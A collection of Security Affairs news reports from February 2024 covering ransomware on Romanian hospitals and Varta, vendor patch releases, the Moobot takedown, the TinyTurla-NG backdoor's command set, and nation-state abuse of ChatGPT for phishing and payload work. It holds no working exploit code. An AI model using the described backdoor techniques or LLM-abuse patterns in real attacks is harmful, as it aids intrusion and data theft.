Romanian Ministry of Health added that cybersecurity specialists, including cybersecurity experts from the National Cyber Security Directorate, are monitoring the situation. The Romanian government also announced extraordinary preventive measures to prevent other hospitals from being impacted by the incident.

DNSC reported that ransomware operators employed a variant of the Phobos ransomware family known as Backmydata ransomware. The threat actors demand the payment of 3.5 BTC (about 157,000 EURO).

“Hospitals using the HIPOCRATE platform, regardless of whether they were affected or not, have since yesterday received a series of recommendations from the DNSC to properly manage the situation” reported DNSC.

• Identify affected systems and immediately isolate them from the rest of the network as well as from the Internet
• Keep a copy of the ransom message and any other communications from the attackers. This information is useful to the authorities or for further analysis of the attack
• Do not shut down the affected equipment. Stopping it will remove the evidence stored in the volatile memory (RAM)
• Collect and keep all relevant log information, from the affected equipment, but also from network equipment, firewall
• Examine the system logs to identify the mechanism by which IT infrastructure has been compromised
• Immediately inform all employees and notify affected customers and business partners of the incident and its extent
• Restore affected systems based on data backups after a full system cleanup has been performed . It is absolutely necessary to ensure that backups are intact, up-to-date and secure against attack
• Ensure that all programs, applications and operating systems are updated to the latest versions and that all known vulnerabilities are patched

At this time, it is still unclear if the threat actors have stolen sensitive data from the impacted organizations.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – ransomware, Romanian hospitals) 

Microsoft Patch Tuesday security updates for February 2024 addressed 72 flaws, two of which are actively exploited in the wild.

Microsoft Patch Tuesday security updates for February 2024 resolved a total of 72 vulnerabilities, including two actively exploited zero-days.

The vulnerabilities affect Microsoft Windows and Windows Components; Office and Office Components; Azure; .NET Framework and ASP.NET; SQL Server; Windows Hyper-V; and Microsoft Dynamics.

Five vulnerabilities are rated Critical, 65 are rated Important, and two are rated Moderate in severity.

The two flaws actively exploited are:

CVE-2024-21412 (CVSS score 8.1) – Internet Shortcut Files Security Feature Bypass Vulnerability. An unauthenticated attacker can trigger the flaw by sending the victim a specially crafted file that is designed to bypass displayed security checks. The attacker has to trick the victims into clicking the file link. The flaw was reported by:

• dwbzn with Aura Information Security
• Dima Lenz and Vlad Stolyarov of Google’s Threat Analysis Group
• Peter Girnus (gothburz) of Trend Micro’s Zero Day Initiative with Trend Micro

CVE-2024-21351 (CVSS score 7.6) – Windows SmartScreen Security Feature Bypass Vulnerability. An authorized attacker can trigger the flaw to bypass the SmartScreen user experience. The attacker can exploit the vulnerability by sending a malicious file to the user and convincing him to open it.

Below is the list of the critical flaws fixed by Microsoft Patch Tuesday security updates for February 2024.

As usual the ZDI has published the full list of CVEs released by Microsoft for February 2024 here:

https://www.zerodayinitiative.com/blog/2024/2/13/the-february-2024-security-update-review

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – ransomware, Patch Tuesday) 

Adobe Patch Tuesday security updates for February 2024 addressed more than 30 vulnerabilities in multiple products, including critical issues.

Adobe Patch Tuesday security updates released by Adobe addressed over 30 vulnerabilities across various products, including critical issues.

The software maker warned of critical flaws in popular products such as Adobe Acrobat and Reader, Adobe Commerce and Magento Open Source, Substance 3D Painter, and FrameMaker.

The company fixed 13 vulnerabilities in the Adobe Acrobat and Reader software, including arbitrary code execution, application denial of service and memory leak vulnerabilities.

“Adobe has released a security update for Adobe Acrobat and Reader for Windows and macOS. This update addresses critical and important vulnerabilities.” reads the advisory. “Successful exploitation could lead to arbitrary code execution, application denial-of-service, and memory leak.”

Below is the list of vulnerabilities addressed by the software vendor:

Vulnerability Category	Vulnerability Impact	Severity	CVSS base score	CVSS vector	CVE Number
Out-of-bounds Write (CWE-787)	Arbitrary code execution	Critical	7.8	CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H	CVE-2024-20726
Out-of-bounds Write (CWE-787)	Arbitrary code execution	Critical	7.8	CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H	CVE-2024-20727
Out-of-bounds Write (CWE-787)	Arbitrary code execution	Critical	7.8	CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H	CVE-2024-20728
Use After Free (CWE-416)	Arbitrary code execution	Important	7.8	CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H	CVE-2024-20729
Integer Overflow or Wraparound (CWE-190)	Arbitrary code execution	Critical	7.8	CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H	CVE-2024-20730
Use After Free (CWE-416)	Arbitrary code execution	Critical	8.8	CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H	CVE-2024-20731
Improper Input Validation (CWE-20)	Application denial-of-service	Important	5.5	CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H	CVE-2024-20733
Use After Free (CWE-416)	Memory leak	Important	5.5	CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N	CVE-2024-20734
Out-of-bounds Read (CWE-125)	Memory leak	Important	5.5	CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N	CVE-2024-20735
Out-of-bounds Read (CWE-125)	Memory leak	Important	5.5	CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N	CVE-2024-20736
Out-of-bounds Read (CWE-125)	Memory leak	Important	5.5	CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N	CVE-2024-20747
Out-of-bounds Read (CWE-125)	Memory leak	Important	5.5	CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N	CVE-2024-20748
Out-of-bounds Read (CWE-125)	Memory leak	Important	5.5	CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N	CVE-2024-20749

Below is the list of vulnerabilities addressed by the software firm that impact Adobe Commerce and Magento Open Source products:

Vulnerability Category	Vulnerability Impact	Severity	Authentication required to exploit?	Exploit requires admin privileges?	CVSS base score	CVSS vector	CVE number(s)
Cross-site Scripting (Stored XSS) (CWE-79)	Arbitrary code execution	Critical	Yes	Yes	9.1	CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H	CVE-2024-20719
Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’) (CWE-78)	Arbitrary code execution	Critical	Yes	Yes	9.1	CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H	CVE-2024-20720
Uncontrolled Resource Consumption (CWE-400)	Application denial-of-service	Important	Yes	Yes	5.7	CVSS:3.1/AV:A/AC:L/PR:H/UI:R/S:C/C:N/I:N/A:H	CVE-2024-20716
Cross-site Scripting (Stored XSS) (CWE-79)	Arbitrary code execution	Important	Yes	Yes	5.4	CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N	CVE-2024-20717
Cross-Site Request Forgery (CSRF) (CWE-352)	Security feature bypass	Moderate	Yes	No	4.3	CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N	CVE-2024-20718

According to the advisory, the above vulnerabilities can be exploited only by an authenticated attacker.

“Exploit requires admin privileges: The vulnerability is (or is not) only exploitable by an attacker with administrative privileges.” states the advisory.

The good news is that the software vendor is not aware of attacks in the wild exploiting these vulnerabilities.

Microsoft Patch Tuesday security updates for February 2024 resolved a total of 72 vulnerabilities, including two actively exploited zero-days.

The vulnerabilities affect Microsoft Windows and Windows Components; Office and Office Components; Azure; .NET Framework and ASP.NET; SQL Server; Windows Hyper-V; and Microsoft Dynamics.

Five vulnerabilities are rated Critical, 65 are rated Important, and two are rated Moderate in severity.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – ransomware, Patch Tuesday) 

Zoom addressed seven vulnerabilities in its desktop and mobile applications, including a critical flaw (CVE-2024-24691) affecting the Windows software.

The popular Video messaging giant Zoom released security updates to address seven vulnerabilities in its desktop and mobile applications, including a critical issue, tracked as CVE-2024-24691 (CVSS score of 9.6), in Windows software.

The vulnerability CVE-2024-24691 is an improper input validation bug that could be exploited by an attacker with network access to escalate privileges.

“Improper input validation in Zoom Desktop Client for Windows, Zoom VDI Client for Windows, and Zoom Meeting SDK for Windows may allow an unauthenticated user to conduct an escalation of privilege via network access.” reads the advisory.

The vulnerability impacts the following products:

• Zoom Desktop Client for Windows before version 5.16.5
• Zoom VDI Client for Windows before version 5.16.10 (excluding 5.14.14 and 5.15.12)
• Zoom Rooms Client for Windows before version 5.17.0
• Zoom Meeting SDK for Windows before version 5.16.5

The company also addressed a high-severity escalation of privilege vulnerability, tracked as CVE-2024-24697, impacting Windows software.

“Untrusted search path in some Zoom 32 bit Windows clients may allow an authenticated user to conduct an escalation of privilege via local access.” reads the advisory.

The issue impacts the following products:

• Zoom Desktop Client for Windows before version 5.17.0
• Zoom VDI Client for Windows before version 5.17.5 (excluding 5.15.15 and 5.16.12)
• Zoom Meeting SDK for Windows before version 5.17.0
• Zoom Rooms Client for Windows before version 5.17.0

The video messaging company also resolved a high-severity escalation of privilege defect in these Windows applications, noting that it can be exploited locally, without authentication.

Tracked as CVE-2024-24697 and described as an untrusted search path issue, the vulnerability impacts Desktop Client before version 5.17.0, VDI Client before version 5.17.5 (excluding 5.15.15 and 5.16.12), Meeting SDK before version 5.17.0, and Rooms Client before version 5.17.0.

Below is the complete list of the addressed issues:

ZSB	Title	Severity	CVE	Date Published	Date Updated
ZSB-24008	Zoom Desktop Client for Windows, Zoom VDI Client for Windows, and Zoom Meeting SDK for Windows – Improper Input Validation	Critical	CVE-2024-24691	02/13/2024	02/13/2024
ZSB-24007	Zoom Clients – Improper Input Validation	Medium	CVE-2024-24690	02/13/2024	02/13/2024
ZSB-24006	Zoom Clients – Business Logic Error	Medium	CVE-2024-24699	02/13/2024	02/13/2024
ZSB-24005	Zoom Clients – Improper Authentication	Medium	CVE-2024-24698	02/13/2024	02/13/2024
ZSB-24004	Zoom Clients – Untrusted Search Path	High	CVE-2024-24697	02/13/2024	02/13/2024
ZSB-24003	Zoom Desktop Client for Windows, Zoom VDI Client for Windows, and Zoom Meeting SDK for Windows – Improper Input Validation	Medium	CVE-2024-24696	02/13/2024	02/13/2024
ZSB-24002	Zoom Desktop Client for Windows, Zoom VDI Client for Windows, and Zoom Meeting SDK for Windows – Improper Input Validation	Medium	CVE-2024-24695	02/13/2024	02/13/2024

It’s unclear if one of the above vulnerabilities has been actively exploited in the wild.

Zoom recommends its users to update their applications to the latest available releases as soon as possible.

In November 2023, the company fixed a critical vulnerability in Zoom Room allowed threat actors to take over meetings and steal sensitive data.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, Zoom)

Researchers reported that attackers can exploit the ‘command-not-found’ utility to trick users into installing rogue packages on Ubuntu systems.

Cybersecurity researchers from cloud security firm Aqua discovered that it is possible to abuse, the popular utility ‘called ‘command-not-found’ that can lead to deceptive recommendations of malicious packages.

“Aqua Nautilus researchers have identified a security issue that arises from the interaction between Ubuntu’s command-not-found package and the snap package repository.” reads the report published by Aqua. “While command-not-found serves as a convenient tool for suggesting installations for uninstalled commands, it can be inadvertently manipulated by attackers through the snap repository, leading to deceptive recommendations of malicious packages.”

The default installation of Ubuntu includes the command-not-found package, it provides suggestions for package installations when users attempt to execute a command in Bash or Zsh that is not available on their system. The command relies on the implementation of the command_not_found_handle function, which Bash invokes when encountering an unrecognized command.

The package provides recommendations for both APT and snap packages. For example, if a user tries to execute “ifconfig” and it’s not installed, the package will suggest installing “net-tools” through apt.

The utility uses a local database located at /var/lib/command-not-found/commands.db to link commands to their corresponding APT packages.

An attacker can claim a Snap name associated with a package for which the maintainers haven’t yet claimed the Snap name. Then the attacker can register a snap name and the upload of a dummy “rogue” package.

“The maintainers of the jupyter-notebook APT package had not claimed the corresponding snap name. This oversight left a window of opportunity for an attacker to claim it and upload a malicious snap named jupyter-notebook.” reads the analysis published by Aqua. “We can observe that the command-not-found utility suggests the snap package first, even before the original APT package. This behavior could potentially mislead users into installing the snap package.”

Moreover, the researchers discovered that up to 26% of commands linked to APT (Advanced Package Tool) packages may be exposed to impersonation. This vulnerability could expose users to supply chain attacks impacting both Linux users and Windows systems running WSL.

The researchers also warn of typosquatting attacks in which attackers requesting commands with typographical errors (e.g., ifconfigg instead of ifconfig) are suggested malicious snap packages that were claimed by the attackers.

“For instance, consider what could occur if a user accidentally types ifconfigg instead of ifconfig” continues the analysis. “the command-not-found package helpfully corrects the user, suggesting the net-tools package for the mistyped ifconfig command. However, the situation becomes more problematic when an attacker capitalizes on these common mistakes by registering a snap with the typo, such as ifconfigg.”

The potential for attackers to exploit the command-not-found utility by suggesting their rogue Snap packages is worrisome.

“It remains uncertain how extensively these capabilities have been exploited, underscoring the urgency for heightened vigilance and proactive defense strategies,” Aqua concludes.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, Ubuntu)

Microsoft and OpenAI warn that nation-state actors are using ChatGPT to automate some phases of their attack chains, including target reconnaissance and social engineering attacks.

Multiple nation-state actors are exploiting artificial intelligence (AI) and large language models (LLMs), including OpenAI ChatGPT, to automate their attacks and increase their sophistication.

According to a study conducted by Microsoft in collaboration with OpenAI, the two companies identified and disrupted operations conducted by five nation-state actors that abused their AI services to carry out their attacks.

The researchers observed the following APT groups using artificial intelligence (AI) and large language models (LLMs) in various phases of their attack chain:

• China-linked APT groups Charcoal Typhoon and Salmon Typhoon;
• Iran-linked APT group Crimson Sandstorm;
• North Korea-linked APT group Emerald Sleet;
• Russia-linked APT group Forest Blizzard.

“Language support is a natural feature of LLMs and is attractive for threat actors with continuous focus on social engineering and other techniques relying on false, deceptive communications tailored to their targets’ jobs, professional networks, and other relationships.” reads the report published by Microsoft. “Importantly, our research with OpenAI has not identified significant attacks employing the LLMs we monitor closely.”

The researchers pointed out that at this time the attackers have yet to use LLMs to devise novel attacks, malicious use of LLMs observed by the researchers include:

• LLM-informed reconnaissance: Employing LLMs to gather actionable intelligence on technologies and potential vulnerabilities.
• LLM-enhanced scripting techniques: Utilizing LLMs to generate or refine scripts that could be used in cyberattacks, or for basic scripting tasks such as programmatically identifying certain user events on a system and assistance with troubleshooting and understanding various web technologies.
• LLM-aided development: Utilizing LLMs in the development lifecycle of tools and programs, including those with malicious intent, such as malware.
• LLM-supported social engineering: Leveraging LLMs for assistance with translations and communication, likely to establish connections or manipulate targets.
• LLM-assisted vulnerability research: Using LLMs to understand and identify potential vulnerabilities in software and systems, which could be targeted for exploitation.
• LLM-optimized payload crafting: Using LLMs to assist in creating and refining payloads for deployment in cyberattacks.
• LLM-enhanced anomaly detection evasion: Leveraging LLMs to develop methods that help malicious activities blend in with normal behavior or traffic to evade detection systems.
• LLM-directed security feature bypass: Using LLMs to find ways to circumvent security features, such as two-factor authentication, CAPTCHA, or other access controls.
• LLM-advised resource development: Using LLMs in tool development, tool modifications, and strategic operational planning.

Microsoft report details the use of LLMs for each APT group, for instance, the Iranian nation-state actor Crimson Sandstorm (CURIUM) used its AI services to generate various phishing emails, to generate code snippets and for assist in developing code to evade detection.

OpenAI reported that the above APT group used its AI services to carry out the following tasks respectively: 

• Charcoal Typhoon used our services to research various companies and cybersecurity tools, debug code and generate scripts, and create content likely for use in phishing campaigns.
• Salmon Typhoon used our services to translate technical papers, retrieve publicly available information on multiple intelligence agencies and regional threat actors, assist with coding, and research common ways processes could be hidden on a system.
• Crimson Sandstorm used our services for scripting support related to app and web development, generating content likely for spear-phishing campaigns, and researching common ways malware could evade detection.
• Emerald Sleet used our services to identify experts and organizations focused on defense issues in the Asia-Pacific region, understand publicly available vulnerabilities, help with basic scripting tasks, and draft content that could be used in phishing campaigns.
• Forest Blizzard used our services primarily for open-source research into satellite communication protocols and radar imaging technology, as well as for support with scripting tasks.

Microsoft announced principles shaping Microsoft’s policy and actions mitigating the risks associated with the abuse of its AI services by nation-state actors, advanced persistent manipulators (APMs), and cybercriminal syndicates.

The principles include Identification and action against malicious threat actors’ use, Notification to other AI service providers, Collaboration with other stakeholders, and Transparency.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – AI services, OpenAI ChatGPT)

U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds 2 Microsoft Windows flaws to its Known Exploited Vulnerabilities catalog.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following two vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog:

• CVE-2024-21412 Microsoft Windows Internet Shortcut Files Security Feature Bypass Vulnerability
• CVE-2024-21351 Microsoft Windows SmartScreen Security Feature Bypass Vulnerability

This week. Microsoft released Patch Tuesday security updates for February 2024 that resolved a total of 72 vulnerabilities, including the above vulnerabilities that are actively exploited in the wild.

Below are the details of the two vulnerabilities:

CVE-2024-21412 (CVSS score 8.1) – Internet Shortcut Files Security Feature Bypass Vulnerability. An unauthenticated attacker can trigger the flaw by sending the victim a specially crafted file that is designed to bypass displayed security checks. The attacker has to trick the victims into clicking the file link. The flaw was reported by:

• dwbzn with Aura Information Security
• Dima Lenz and Vlad Stolyarov of Google’s Threat Analysis Group
• Peter Girnus (gothburz) of Trend Micro’s Zero Day Initiative with Trend Micro

CVE-2024-21351 (CVSS score 7.6) – Windows SmartScreen Security Feature Bypass Vulnerability. An authorized attacker can trigger the flaw to bypass the SmartScreen user experience. The attacker can exploit the vulnerability by sending a malicious file to the user and convincing him to open it.

Trend Micro researchers reported that the flaw CVE-2024-21412 was used in a zero-day attack chain by the APT group Water Hydra.

A new vulnerability discovered by @thezdi was used in a zero-day attack chain by the APT group Water Hydra.

Watch Trend Micro Sr. Threat Researcher @gothburz share his expert insights on CVE-2024-21412. pic.twitter.com/AZasBtG2Ot

— Trend Micro Research (@TrendMicroRSRCH) February 13, 2024

The popular researcher Will Dormann speculates that CVE-2024-21412 results from the partial fix of the vulnerability CVE-2023-36025. The fix for CVE-2023-36025 didn’t consider the case where a .URL file points to a .URL file, Dormann explained.

Ah, so it looks like CVE-2024-21412 is to address a bypass for CVE-2023-36025, which was the fact that remote targets inside of a ZIP didn't get SmartScreen love. The fix for CVE-2023-36025 didn't consider the case where a .URL file points to a .URL file.https://t.co/SLpw0L7mtY pic.twitter.com/x3lskKmBRi

— Will Dormann (@wdormann) February 13, 2024

According to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities, FCEB agencies have to address the identified vulnerabilities by the due date to protect their networks against attacks exploiting the flaws in the catalog.

Experts recommend also private organizations review the Catalog and address the vulnerabilities in their infrastructure.

CISA orders federal agencies to fix this vulnerability by March 5, 2024.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – Hacking, Known Exploited Vulnerabilities catalog)

The office of South Korean President Yoon Suk Yeol said that North Korea-linked actors breached the personal emails of one of his staff members.

The office of South Korean President Yoon Suk Yeol announced a security incident involving the compromise of personal emails belonging to a member of the presidential staff. The government attributes the security breach to North Korean threat actors. The attackers had access to the personal emails of the staff member ahead of Yoon’s trip to Europe in November 2023.

The office of the South Korean President explained that the compromise of the account occurred due to the staff member utilizing commercial email services for official responsibilities.

At this time it’s unclear which kind of information was exposed, however, Yoon’s office pointed out that threat actors did compromise the overall office’s security system.

“We detected the case in advance of (Yoon’s) visit and took necessary measures,” Yoon’s office said in a statement to reporters, according to the Associated Press. The office said it has been monitoring and defending against “constant” hacking attempts presumed to be related to North Korea but “it’s not that the presidential office’s security system got hacked.”

South Korea is a privileged target of cyber espionage operations carried out by North Korea-linked APT groups.

North Korea-linked APT groups are also known to be focused on attacks against crypto exchange and financial organizations in South Korea.

Recently, a U.N. panel of experts announced an investigation into 58 suspected North Korean cyberattacks between 2017 and 2023 valued at approximately $3 billion.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, North Korea)

On February 12, 2023, a cyber attack halted operations at five production plants of German battery manufacturer Varta.

On February 13, German battery manufacturer Varta announced that a cyber attack forced the company to shut down IT systems. The attack disrupted operations at five production plants and the administration.

VARTA AG is a leading global manufacturer of batteries with over 4,500 employees worldwide, reporting revenue of €1.2 billion in 2023.

The announcement revealed that the company has temporarily shut down its systems to contain the threat, a circumstance that suggests it was the victim of a ransomware attack.

The company launched an investigation into the incident, with the help of forensics experts, to determine its scope.

“Last night, February 12th 2024, the VARTA Group was the target of a cyber attack on parts of its IT systems. This affects the five production plants and the administration. The IT systems and thus also production were proactively shut down temporarily for security reasons and disconnected from the internet. The IT systems and the extent of the impact are currently being reviewed. The utmost care is being taken to ensure data integrity. The extent of the actual damage cannot be determined at this time. In accordance with the emergency plan for such situations, the necessary precautionary measures were implemented immediately.” reads the statement published by the company. “Additionally, a task force was set up instantly to restore normal operations as quickly as possible and deal with the incident with the support of cyber security experts and data forensics specialists.”

Impacted production plants are in Germany, Romania and Indonesia, on February 14 the operations at the plants were still blocked.

“The battery manufacturer’s production continues to stand still after a hacker attack. A spokesman for the company from Ellwangen in Baden-Württemberg told the German Press Agency on Wednesday afternoon upon request. The five production sites, three of them in Germany and one each in Romania and Indonesia, are affected. Likewise the administration.” reported the German website Finanzen.

At this time, no known ransomware group has claimed responsibility for the attack.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, Varta)

The US authorities dismantled the Moobot botnet, which was controlled by the Russia-linked cyberespionage group APT28.

A court order allowed US authorities to neutralize the Moobot botnet, a network of hundreds of small office/home office (SOHO) routers under the control of the Russia-linked group APT28.

The botnet was used by the Russian state-sponsored hackers to carry out a broad range of attacks.

“A January 2024 court-authorized operation has neutralized a network of hundreds of small office/home office (SOHO) routers that GRU Military Unit 26165, also known as APT28, Sofacy Group, Forest Blizzard, Pawn Storm, Fancy Bear, and Sednit, used to conceal and otherwise enable a variety of crimes.” reads the press release published by DoJ. “These crimes included vast spearphishing and similar credential harvesting campaigns against targets of intelligence interest to the Russian government, such as U.S. and foreign governments and military, security, and corporate organizations. In recent months, allegations of Unit 26165 activity of this type has been the subject of a private sector cybersecurity advisory and a Ukrainian government warning.”

The Moobot botnet was composed of hundreds of compromised Ubiquiti Edge OS routers, it was initially created by a known cyber criminal group and later controlled by the Russia-linked APT group.

The Mirai-based Moobot botnet was first documented by Palo Alto Unit 42 researchers in February 2021, in November 2021, it started exploiting a critical command injection flaw (CVE-2021-36260) in the webserver of several Hikvision products. Since September 2022, Moobot botnet was spotted targeting vulnerable D-Link routers.

In April 2023, FortiGuard Labs researchers observed a hacking campaign targeting Cacti (CVE-2022-46169) and Realtek (CVE-2021-35394) vulnerabilities to spread ShellBot and Moobot malware.

The court order allowed authorities to use the Moobot malware to copy and delete stolen and malicious data and files from compromised routers. The US government operation blocked access to the routers by Russian cyberspies. The operation reversibly modified the routers’ firewall rules to block remote management access to the devices.

“The Department’s court-authorized operation leveraged the Moobot malware to copy and delete stolen and malicious data and files from compromised routers.” continues the press release. “Additionally, in order to neutralize the GRU’s access to the routers until victims can mitigate the compromise and reassert full control, the operation reversibly modified the routers’ firewall rules to block remote management access to the devices, and during the course of the operation, enabled temporary collection of non-content routing information that would expose GRU attempts to thwart the operation.”

According to court documents, the government extensively tested the operation on the relevant Ubiquiti Edge OS routers. The DoJ pointed out that apart from hindering the GRU’s ability to access the routers, the operation did not affect the routers’ normal functionality or gather legitimate user content information. The court order also allowed the authorities to disconnect the routers from the Moobot network; users can revert the firewall rule changes by performing factory resets of their routers or accessing their routers through the local network.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, Moobot botnet)

Russia-linked APT group Turla has been spotted targeting Polish non-governmental organizations (NGO) with a new backdoor dubbed TinyTurla-NG.

Russia-linked cyberespionage group Turla has been spotted using a new backdoor dubbed TinyTurla-NG in attacks aimed at Polish non-governmental organizations.

The Turla APT group (aka Snake, Uroburos, Waterbug, Venomous Bear and KRYPTON) has been active since at least 2004 targeting diplomatic and government organizations and private businesses in the Middle East, Asia, Europe, North and South America, and former Soviet bloc nations.

Cisco Talos researchers reported that “TinyTurla-NG” (TTNG) is similar to Turla’s implant TinyTurla.

TinyTurla-NG was spotted in early December 2023, it was employed in attacks targeting NGOs working on improving Polish democracy and supporting Ukraine during the Russian invasion.

“Talos assesses with high confidence that TinyTurla-NG, just like TinyTurla, is a small “last chance” backdoor that is left behind to be used when all other unauthorized access/backdoor mechanisms have failed or been detected on the infected systems.” reads the report published by Cisco Talos.

Talos also discovered previously undetected PowerShell dubbed “TurlaPower-NG ” that was designed for data exfiltration. Turla operators used the scripts to exfiltrate keys used to secure the password databases of popular password management software.

The cybersecurity firm identified three different TinyTurla-NG samples, and gained access to two of them. This latest campaign began at least on December 18, 2023, and was still active as recently as January 27, 2024. Evidence gathered by the experts suggests that that campaign may have begun as early as November 2023. 

Turla operators used compromised WordPress websites as C2 for the TinyTurla-NG backdoor. Threat actors compromised the websites running vulnerable versions of the popular CMS, including 4.4.20, 5.0.21, 5.1.18 and 5.7.2. The attackers uploaded PHP files containing the C2 code consisting of names such as: rss-old[.]php, rss[.]old[.]php or block[.]old[.]php.

Since the beginning of the campaign, the attackers used various C2 servers to host PowerShell scripts and arbitrary commands that could be executed on the victim’s machine.

Like TinyTurla, TinyTurla-NG operates as a service DLL initiated through svchost.exe. The malware uses Windows events for synchronization, with the first primary malware thread initiated in the DLL’s ServiceMain function.

The malware supports the following commands:

• “changeshell”: This command will instruct the backdoor to switch the current shell being used to execute commands, i.e., from cmd.exe to PowerShell.exe, or vice versa.
• “changepoint”: This command is used to likely tell the implant to switch to the second C2 URL present in the implant.
• “get”: Fetch a file specified by the C2 using an HTTP GET request and write it to the specified location on disk.
• “post”: Exfiltrate a file from the victim to the C2, e.g., post C:\some_file.bin.
• “killme”: Create a BAT file (see below) with a name based on the current tick count. Then, use the BAT file to delete a file from the disk of the victim machine, e.g., killme <filename>. The BAT file is executed via cmd.exe /c <BAT-file-name>.bat. 

The report includes indicators of compromise (IoCs).

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, Turla)

U.S. CISA revealed that threat actors breached an unnamed state government organization via an administrator account belonging to a former employee.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) revealed that a threat actor gained access to an unnamed state government organization’s network environment via an administrator account belonging to a former employee.

CISA and the Multi-State Information Sharing & Analysis Center (MS-ISAC) published a joint Cybersecurity Advisory (CSA) to provide network defenders with the tactics, techniques, and procedures (TTPs) utilized by a threat actor.

The government experts conducted an incident response assessment of the state government organization after its documents were posted on the dark web. The threat actor compromised network administrator credentials through the account of a former employee that was used to successfully authenticate to an internal virtual private network (VPN) access point. Then the attackers made lateral movement and executed various lightweight directory access protocol (LDAP) queries against a domain controller. The government organization also hosts its sensitive data on an Azure environment which was not accessed by the attackers.

“The logs revealed the threat actor first connected from an unknown virtual machine (VM) to the victim’s on-premises environment via internet protocol (IP) addresses within their internal VPN range. CISA and MS-ISAC assessed that the threat actor connected to the VM through the victim’s VPN with the intent to blend in with legitimate traffic to evade detection.” reads the report published by CISA.

The threat actor likely obtained the employee’s account credentials from a third-party data breach.

The threat actor likely obtained the account credentials of a second user from the virtualized SharePoint server managed by the first user. Neither of the two administrative accounts had multifactor authentication (MFA) enabled.

CISA pointed out that the victim confirmed that the administrator credentials for the second user were stored locally on this server.

Access to the virtualized SharePoint server enabled threat actors to also acquire a separate set of credentials stored on the server, granting administrative privileges to both the on-premises network and Azure Active Directory.

The report includes a lot of interesting details about the threat actor’s activity along with mitigations in accordance with the Cross-Sector Cybersecurity Performance Goals (CPGs) established by CISA and the National Institute of Standards and Technology (NIST), which are recommended to all critical infrastructure entities and network defenders.

CISA did not attribute the attack to a specific threat actor.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, CISA)

The U.S. government offers rewards of up to $10 million for information that could lead to the identification or location of ALPHV/Blackcat ransomware gang leaders.

The U.S. Department of State is offering a reward of up to $10 million for information leading to the identification or location of the key figures behind the ALPHV/Blackcat ransomware operation. The US government is also offering a reward offer of up to $5 million for information leading to the arrest and/or conviction in any country of any individual conspiring to participate in or attempting to participate in ALPHV/Blackcat ransomware attacks.

This additional reward aims to target affiliated and initial access brokers involved and that facilitated the attacks of the group.

BlackCat/ALPHV ransomware gang has been active since November 2021, the list of its victims is long and includes industrial explosives manufacturer SOLAR INDUSTRIES INDIA, the US defense contractor NJVC, gas pipeline Creos Luxembourg S.A., the fashion giant Moncler, the Swissport, NCR, and Western Digital. The ransom demands of the group range from a few tens of thousands of dollars up to tens of millions of dollars.

On December 19, 2023, the FBI seized the Tor leak site of the AlphV/Blackcat ransomware group and replaced the home page with the announcement of the seizure.

On December 7th, BleepingComputer and other prominent experts reported that the ALPHV gang’s websites went offline.

On December 10th, the primary domain of the group went offline and administrators claimed the problem was caused by a hardware failure. At the same time, rumors circulated that the site was taken offline as a result of law enforcement’s operation. The group always denied this circumstance, but today the domain displayed the following message to the visitors.

The seizure is the result of a joint operation conducted by international law enforcement agencies from the US, Denmark, Germany, UK, Netherlands, Germany, Australia, Spain, Austria and Europol.

“This action has been taken in coordination with the United States Attorney’s Office for the Southern District of Florida and the Computer Crime and Intellectual Property Section of the Department of Justice with substantial assistance from Europol and Zentrale Kriminalinspektion Guttingen.” reads the message published by law enforcement on the seized websites.

“The Justice Department announced today a disruption campaign against the Blackcat ransomware group — also known as ALPHV or Noberus — that has targeted the computer networks of more than 1,000 victims and caused harm around the world since its inception, including networks that support U.S. critical infrastructure.” reads the press release published by DoJ.

